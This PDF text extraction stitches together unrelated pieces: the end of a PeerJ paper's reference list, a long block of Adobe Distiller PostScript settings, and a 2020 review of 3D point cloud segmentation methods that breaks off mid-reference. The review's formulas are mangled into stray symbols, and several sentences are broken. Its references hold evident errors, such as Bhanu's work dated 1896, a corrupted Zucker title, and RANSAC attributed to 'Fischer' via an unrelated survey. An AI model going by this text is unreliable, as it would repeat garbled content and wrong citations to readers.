A, Dumke RR. 2006. Product metrics for service-oriented infrastructures. In: IWSM/Metrikon. Potsdam. Salman I, Misirli AT, Juristo N. 2015. Are students representatives of professionals in software engineering experiments? In: 2015 IEEE/ACM 37th IEEE International Conference on Software Engineering. Piscataway: IEEE. Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 25/25 http://dx.doi.org/10.19153/cleiej.20.3.2 http://dx.doi.org/10.1109/TSE.1976.233837 http://dx.doi.org/10.1016/j.infsof.2015.04.002 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ On the impact of service-oriented patterns on software evolvability: a controlled experiment and metric-based analysis Introduction Background Experiment Design Experiment Results Metric Analysis Discussion Threats to Validity Lessons Learned from the Experiment Conclusion flink10 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_evvbv2farjctznji56aki4kdpu ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 DOI: 10.21307/ijanmc-2020-010 66 Review of 3D Point Cloud Data Segmentation Methods Ruan Xiaoyi School of Computer Science and Engineering Xi’an Technological University Xi’an, 710032, China E-mail: 2827538117@qq.com Liu Baolong School of Computer Science and Engineering Xi’an Technological University Xi’an, 710032, China E-mail: liu.bao.long@hotmail.com Abstract—3D point cloud segmentation is one of the key steps in point cloud processing, which is the technology and process of dividing the point cloud data set into several specific regions with unique properties and proposing interesting targets. It has important applications in medical image processing, industrial inspection, cultural relic’s identification and 3D visualization. Despite widespread use, point cloud segmenta- tion still faces many challenges because of uneven sampling density, high redundancy, and lack explicit structure of point cloud data. The main goal of this paper is to analyse the most popular algorithms and methodologies to segment point clouds. To facilitate analysis and summary, according to the principle of segmentation we divide the 3D point cloud segmentation methods into edge-based methods, region-based methods, graph-based methods, model-based methods, and machine learning-based methods. Then analyze and discuss the advantages, disadvantages and application scenarios of these segmentation methods. For some algorithms the results of the segmentation and classification is shown. Finally, we outline the issues that need to be addressed and important future research directions. Keywords-Line Point Cloud; Segmentation; Classification I. INTRODUCTION Image segmentation is one of the basic research directions of computer vision, and its purpose is to subdivide a digital image into multiple regions with similar properties[1]. Segmentation of 2D images has more than 50 years of research history, but 3D point cloud data is a highly redundant and irregularly ordered structure, point cloud segmentation also faces many challenges. The segmentation of point clouds into foreground and background is a fundamental step in processing 3D point clouds. Given the set of point clouds, the 3D point cloud segmentation can be defined with the sets: Let the surface set },...,{ 21 n FFFF  reconstructed from the point set S, and the set },...,{ 21 n RRRR  be a subset of the power set of S . Each element in R is a set of point sets corresponding to a certain characterist- ic surface in F , which represents a region obtained by segmentation. If the following conditions are met, R is called a partition of the point set S : 1)  n i i SR 1  , indicates that the union of the divi-ded regions is the measured point set S , that is, each measurement point is divided into a certain region. 2)  ji RR Ø, indicates that the point sets obta- ined by segmentation do not intersect each other, and each measurement point cannot belong to two different regions at the same time. 3) The points in each region have the same characteristics, and any two adjacent regions do not have the same characteristics. 4) ),...,2,1( niVi  , R are all connected regions. II. METHODS SUMMARY We divide the 3D point cloud segmentation method into:edge-based methods, region-based methods, graph-based methods, model-based methods, and machine learning-based methods based on the basis of the current segmentation. A. Edge-based methods The edge-based segmentation method is currently the most studied method[2]. Edges are the basic features that describe the shape of point cloud objects (Figure 1). The edge-based segmentation method first detects the geometric boundary points of the data points. The edge of the point cloud is usually composed of the normal vector of the point cloud or the boundary points with abrupt curvature. These boundary points International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 67 are connected and then the entire data set is divided into the independent multiple point sets achieve the purpose of segmenting the point cloud. Therefore, the edge detection technology is the key to edge-based segmentation. Bhanu[3] first used gradients to detect edges, fitting 3D lines to set points, and detecting changes in the direction of the unit normal vector on the surface. Subsequently, Jiang[4] proposed a fast segmentation method using scanline grouping technology. The scan lines of the distance image are divided into curves and then they are clustered to represent the surface. This method is better than Bhanu 's method in segmentation quality and running time , but it is not suitable for point clouds with uneven density. Sappa[5] proposed a new edge detection method. By performing edge detection on binary maps, extracting closed contours for fast segmentation; Wang et al.[6] proposed a fast point cloud edge detection algorithm. First, the point cloud data is grid-organized to exclude non-edge discrete points. Finally, AlphaShapes judgment conditions are used to fficiently extract edges, which can effectively avoids the problem of extracting outer boundaries and holes. (a)original point cloud (b) the edge of data a. Figure 1. Point Cloud and Its Edge The advantage of edge-based segmentation is that it has good segmentation results for data with strong contrast in different regions, and can detect the edges of different regions very intuitively. The disadvantage is that although it detects all the edges, it is difficult to determine the detection, the relationship between the edge of the target area and the boundary of the target area. In addition, such algorithms are very sensitive to noise and are not suitable for objects with smooth surface changes. B. Area-based methods The region-based method classifies nearby points with similar attributes by searching for neighborhood information to achieve the purpose of segmentation. In 1976 Zucker[7] proposed a " Region Grow " should be split for 2D images, the researchers used after being 3D point cloud. The segmentation as shown in follows the Figure 2. Firstly, a small piece of seed region is given to the segmentation target, and the seed region is used as a starting point to search for the neighborhood; the curvature, normal vector, and geometric features of the point cloud are used as standards; if a point meets the criteria for seed growth, the point is incorporated into the seed region, and the process is repeated as a new seed point, until all points are detected, a growth region is formed. The segmentation results are shown in Figure 3. However, this method has the problems of being easily affected by noise and easily causing the problem of segmentation holes and excessive segmen- tation. [8-9]. Figure 2. Area-based methods flow chart (a)original point cloud (b)segmented by Region Grow Figure 3. Example of Region grow segmentation Many scholars then the algorithm is improved. Zhang[10] use Otsu determining the optimal segmetati- on threshold as a constraint condition of growth, better than the traditional segmentation methods, but is susceptible to noise; Angelina et al.[11] improved the region growing method with region merging and genetic algorithms, and its segmentation efficiency has been improved to some extent, but the boundary retention is poor; Xiao et al.[12] proposed clustering- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 68 based adaptive region growth for road image segmentation Method, but its scope of application is limited; Besl et al.[13] divide the image into 8 regions based on the curvature characteristics by calculating the Gaussian and average curvature of the point cloud surface, set seed nodes for these 8 regions, and then use polynomial simulation This method is highly suscep- tible to noise and is time-consuming; Chen et al.[14] calculated the ratio of the minimum eigenvalue of each point and the sum of the three eigenvalues by decom- posing the covariance matrix, and the ratio was minimum point as a seed point, the process is mainly used in the building plane extraction rule, the high cost of time; Vosselman et al.[15] use randomly selecting seed sampling points, is determined these seed point whether neighborhood can be fitted to a predetermined model, but the method is prone to false segmentation; Koster[16] using the generated information in a relatively irregular pyramid FIG between the storage area, for comparing and merging adjacent regions; Pu [17] planar surface of the growth surface segmentation algorithm laser transactions; Ning seats[18] proposed a two-step method based on the coarse segmentation and fine segmentation, for extracting the main subject in the scene and finer details. The region-based method is more accurate than the edge-based method. For the seed method, the segmen- tation effect is directly related to the selection of the seed points. The quality of the seeds and the merge rules determine the segmentation effect, and this method is extremely susceptible to noise, causes over or under segmentation. C. Model-based approach This method is based on geometric shapes such as spheres, cones, planes, and cylinders to group point clouds. According to these shapes, points with the same mathematical model will be divided into the same region. The most typical algorithm is Fischer[19] random sample consensus algorithm (RANSAC) and the improvement of the method. RANSAC achieves segmentation by detecting features with regular geome- tric shapes such as planes, spheres, and cylinders. The basic principle of the algorithm is to calculate the mathematical model parameters of the data based on a set of sample data sets containing abnormal data to obtain valid sample data. Figure 4 compares the least squares method with the RANSAC algorithm. The results are shown in noisy data In addition, RANSAC can more effectively fit the target. RANSAC is widely used in the extraction of building surfaces; Li[20] proposed an efficient RAN- SAC based algorithm on traditional RANSAC, which has good performance. Noise immunity to segment millions of point clouds of a sample in less than a minute. Hough transform the detection points into Hough space[21]. Then a voting algorithm is used to detect objects with a specific shape, so that the problem of detecting arbitrary shapes is transformed into a statistical peak problem[22], which is mostly used for the detection of circles and ellipses. Document[23] compared RANSAC and 3D Hough transform results show 3D Hough transform segment parameter values slower and more sensitive, RANSAC the detection result in the time segments and run more efficiently. However, when RANSAC is applied to plane detection, the “pseudo-plane” problem often occurs. To solve this problem, an improved RANSAC method[24] based on Normal Distribution Transfor-mation (NDT) units, which is accurate. The rate can reach more than 88.5 %, and the plane integrity exceeds 85.0 %. In most cases, the method based on model fitting it needs to provide the geometric model to be detected. Zhang et al.[25] provide a multi-model fitting method based on splitting and merging, which can eliminate the need to set the number of models in advance. In this case, automatic segmentation of point cloud is realized. (a) Least squares fitting (b) RANSAC Figure 4. Comparison of Least Squares Fitting and RANSAC The model-based method has pure mathematical principles, is fast and powerful, and has heterogeneity. The main limitation of this method is the inaccuracy of dealing with different point clouds. This method has been implemented in point cloud libraries based on various models based on lines, planes, circles, and so on. D. Graph theory-based approach Graph theory image segmentation uses the principle of graph segmentation to segment the point cloud. This type of algorithm models the point cloud into a graph model composed of nodes and edges that reflect the relationship between the nodes. Graph theory-based optimal segmentation is typified by the FH algorithm proposed by Felzensawalb and Huttenloch[26] . This method constructs a weighted undirected graph using point clouds as vertices, calculates RGB differences International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 69 between different vertices to construct weights, and combines regions. Chen[27] achieves the goal of auto- matic segmentation by building a k-nearest neighbor graph, adding background constraints, and finding the minimum secant line. Compared with several segmen- tation methods, the results show that this method is suitable for segmenting foreground and background, suitable for specified target extraction, or implementing multi-objective extraction in a supervised classification manner. Ural et al.[28] suppose that a conditional random field model exists, and use graph cut algorithm to disconnect part of the graph model to form indepen- dent regions according to the maximum posterior estimation criterion. Li et al.[29] proposed a progre- ssive form of a two-level optimal segmentation algorithm. First, the topological relationship and the distance measurement characteristics of points were calculated under the Riemann geometry frame. The k- means clustering method was used to obtain the segmented voxels as the bottom layer. Segmentation result. Then, the voxels of the point cloud are modeled as nodes, the minimum spanning tree is constructed, and the high-level feature information of the nodes is extracted. The region segmentation effect of the point cloud details is obtained by using graph optimization. Much of the work of graph-based methods has been invested in probabilistic inference models, such as the conditional random field (CRF) method, which uses CRFs to label points with different geometric surface primitives. Graph theory-based methods can still efficiently segment point clouds in complex backgrounds, but these methods often lack real-time performance[30]. E. Machine learning-based methods Machine learning treats point cloud segmentation as classifying point cloud data. YU[31] proposed a neural network learning method that combines segmentation and classification simultaneously for target recognition;Yang[32] uses support vector machines to classify geometric features; Guan et al.[33] converts point clouds into voxels data to extract features and then use AdaBoost for training and target extraction; currently the most well-known is Charles et al.[34] use neural network for Point Set for 3D classification and segmentation-PointNet. Although PointNet can discri- minate the type of object, it lacks robustness to noise and data. To solve this problem, Charles et al. Proposed PointNet++, which can extract local features at different scales and obtain deep features through a multilayer network structure. In addition, Zhao et al. [35] proposed a deep neural network model based on multi-scale features and PointNet for feature classifi- cation of LiDAR point cloud data in complex scenes. This method improves the local feature rxtraction of PointNet. Ability to realize the automatic classification of LiDAR point clouds in complex scenes; Niu[36] improved the problem of the lack of local topological information of the generated features, and proposed a method that uses bisymmetric functions and spatial transformation networks to obtain more robust and stronger discrimination Compared with PointNet++, the training time is reduced by 20% with the same accuracy. The advantages of machine learning-based methods are good classification results and high accuracy. But these algorithms require the training process large amounts of data have been tagged to do the training sample, and dividing the object is defined as the target has been trained, it is difficult to point to complete the modeling of the relationship, so that the algorithm is difficult to comprehensively promote. Comparison of various point cloud segmentation methods is shown in Table Ⅰ. TABLE I. COMPARISON OF VARIOUS POINT CLOUD SEGMENTATION METHODS segmentation methods Advantage Disadvantage edge-based methods Can detect the edges of different areas very intuitively for point cloud. sensitive to noise and not suitable for objects with smooth surface changes. region-based methods More accurate than edge- based methods. The segmentation result depends on the quality of the seeds and the merging rules. There will be over- segmentation or under- segmentation. model-based methods Fast segmentation speed, and heterogeneous,suitable for simple geometric models. Difficult to use in complex scenarios. graph-based methods Suitable for complex scenes. Lack of real-time. machine learning- based methods. Point cloud segmentation has high accuracy, good recognition effect. lack of real-time. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 70 III. CONCLUSION Point cloud segmentation is a necessary link for target detection and 3D reconstruction. This paper investigates some classic point cloud segmentation methods and analyzes their advantages and disadvantages. As can be seen from this article, although point cloud segmentation has undergone a long period of research, there are still limitations. Segmentation methods based on edges and regions have good real-time performance but are sensitive to noise, and the segmentation effect is often not ideal. The method based on model fitting has great limitations and it is difficult to adapt to the segmentation requirements of complex environments. Although graph-based and machine learning-based methods can overcome noise and efficiently segment point cloud data, it is difficult to meet real-time system requirements. Therefore, how to overcome the influence of noise and how to improve the real-time performance of the segmentation system is still the focus of point cloud segmentation research. ACKNOWLEDGMENT The completion of this paper is inseparable from the patient guidance of Prof. Liu Baolong, Prof. Chen Hua, Teacher Wu Qiong, and Teacher Lipeng Si. I also thank other teachers and students in this laboratory for their help. Finally, I would like to thank the science and technology program of Weiyang District of Xi'an City (Project No.: 2018036) for its fund support. REFERENCES [1] Shapiro L, Stockman G. Computer Vision Prentice Hall [J]. 2001:62(3): 271-279. [2] Luo Xiping, Tian Jie, Zhuge infants, and the like. Summary of image segmentation [D]. 1999. [3] B. Bhanu, S. Lee, C. Ho, and T. Henderson, Range data processing: Representation of surfaces by edges [J]. In proc.int. Pattern recognition conf. 1896: 236-238. [4] XY Jiang, H. Bunke, and U. Meier, Fast range image segmentation using high-level segmentation primitives [J], In 3rd IEEE Workshop on Applications of Computer Vision. 1996. [5] A. Sappa, M. Devy, Fast range image segmentation by an edge detection strategy. In 3D Digital Imaging and Modeling. 2001. [6] Wang Zongyue, Ma Hongchao, Xu Honggen, et al. Research on water body contour extraction method based on LiDAR point cloud data [J]. Wuhan University Journal of Information Science. 2010:31-26. [7] Zucker SW. Regiorowing: childhood and adolescence [J], Computer Graphics and Image Processing. 1976, 17(1): 99-125. [8] Li Renzhong, Liu Yangyang, Yang Man, et al. 3D point cloud segmentation based on improved region growth [J]. Chinese Journal of Optics, 2018:23-26. [9] Gao F. 375 cases of MATLAB image processing [M]. Beijing: Posts and Telecommunications Press, 2015. [10] Zhang L, Guo LM, He W, et al. An image segmentation algorithm based on maximal variance between-class and region growing [J] . Information and Electronic Engineering. 2005 .:45-48 [11] Angelina S, Suresh LP, Veni SH K. Image segmentation based on genetic algorithm for region growth and region merging [C]. Computing, Electronics and Electrical Technologies, 2012. [12] Xiao Xiaoming, Ma Zhi, Cai Zixing, et al. An adaptive region growing algorithm for road segmentation [J]. Control Engineering, 2011, 18(3): 364. [13] Besl P J, Jain R C. Segmentation through variable-order surface fitting [J]. IEEE Transactions on pattern analysis and machine intelligence, 1988, 10(2): 167-192. [14] Chen J, Chen BQ. Architectural modeling from sparsely scanned range data [J]. International Journal of Computer Vision, 2008. [15] Vosselman G, Gorte B G H, Sithole G, et al. Recognising structure in laser scanner point clouds[J]. International archives of photogrammetry, remote sensing and spatial information sciences, 2004, 46(8): 33-38. [16] Koster K, Spann M. MIR: An approach to robust clustering- application to range image segmentation [J]. IEEE Transactions on Pattern Analysis and Machine Intelligence, 2000, 22(5): 430-444. [17] Pu S, Vosselman G. Automatic extraction of building features from terrestrial laser scanning [J]. International Archives of Photogrammetry, Remote Sensing and Spatial Information Sciences, 2006, 36(5): 25-27. [18] X. Ning, X. Zhang, Y. Wang, M. Jaeger, Segmentation of architecture shape information from 3D point cloud[J]. In VRCAI, 2009:77-81 [19] Nguyen A, Le B. 3D point cloud segmentation: A survey[C].2013 6th IEEE conference on robotics, automation and mechatronics (RAM). IEEE, 2013. [20] Yan Li, Xie Hong, Hu Xiaobin, et al. A new hybrid point cloud plane segmentation method [J]. Journal of Wuhan University (Information Science Edition), 2013:128-130. [21] Schnabel, Ruwen. Efficient RANSAC for point ‐ cloud shape detection [J]. Computer graphics forum, 2007, 8(06): 1259-1284. [22] PVC Hough (1962) Method and Means for Recognizing Complex Patterns, US Patent 3069654. [23] Tarsha-Kurdi, Fayez, Tania Landes, and Pierre Grussenmeyer. Hough-transform and extended ransac algorithms for automatic detection of 3d building roof planes from lidar data [J], 2007. [24] Li L, Yang F, Zhu H, et al. An improved RANSAC for 3D point cloud plane segmentation based on normal distribution transformation cells [J]. Remote Sensing, 2017:160-163. [25] ZHANG Liangpei, Z Yun, C Zhenzhong, et al. Splitting and Merging Based Multi-model Fitting for Point Cloud Segmentation. Acta Geodaetica et Cartographica Sinica, 2018. [26] Felzenszwalb P F, Huttenlocher D P. Efficient graph-based image segmentation [J]. International journal of computer vision, 2004, 59(2): 167-181. [27] Chen X, Golovinskiy A, Funkhouser T. A benchmark for 3D mesh segmentation [J]. Acm transactions on graphics (tog), 2009, 28(3): 1- 12. [28] URAL S, SHAN J. Min-cut Based Segmentation of Airborne LiDAR Point Clouds[C]. International Archives of the Photogrammetry, Remote Sensing and Spatial Information Sciences, XXXIX-B3. Melbourne, Australia:ISPRS, 